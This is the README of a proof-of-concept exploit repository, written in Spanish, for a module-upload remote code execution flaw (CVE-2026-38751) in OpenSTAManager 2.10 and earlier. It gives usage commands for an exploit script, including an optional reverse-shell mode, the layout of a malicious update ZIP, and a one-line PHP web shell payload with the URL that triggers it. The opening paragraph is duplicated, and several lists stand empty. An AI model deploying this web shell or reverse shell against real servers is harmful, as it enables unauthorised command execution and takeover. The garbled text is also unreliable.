
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2026-38751, que afecta a OpenSTAManager ≤ 2.10. La vulnerabilidad permite que un atacante autenticado cargue un módulo malicioso a través de la funcionalidad de actualización de módulos, lo que lleva a una carga arbitraria de archivos y ejecución remota de código (RCE).
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2026-38751, que afecta a OpenSTAManager ≤ 2.10. La vulnerabilidad permite a un atacante autenticado cargar un módulo malicioso a través de la funcionalidad de actualización de módulos, lo que conduce a la carga arbitraria de archivos y a la ejecución remota de código (RCE).
modules/aggiornamenti/upload_modules.php)La funcionalidad de actualización de módulos permite a los usuarios autenticados cargar módulos basados en ZIP sin una validación adecuada del contenido de los archivos ni de los límites de ejecución. Un atacante puede crear un módulo malicioso que contenga cargas útiles de PHP, las cuales se despliegan en la raíz web y se ejecutan a través del contexto de la aplicación. Esto resulta en:
##Impacto La explotación exitosa permite:
python exploit.py --build
Crea:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
Modo de shell inversa opcional:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
Ejemplo de carga útil
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
Si es exitoso, el siguiente endpoint ejecuta comandos del sistema:
/modules/run/evil.php?cmd=id
Este proyecto está destinado a:
No lo utilice contra sistemas sin permiso explícito.
Notas
La detección puede variar según la configuración del servidor. Algunos despliegues pueden deshabilitar la ejecución directa de PHP en los directorios de módulos. El momento de activación del módulo puede requerir reintentos.
Agradecimientos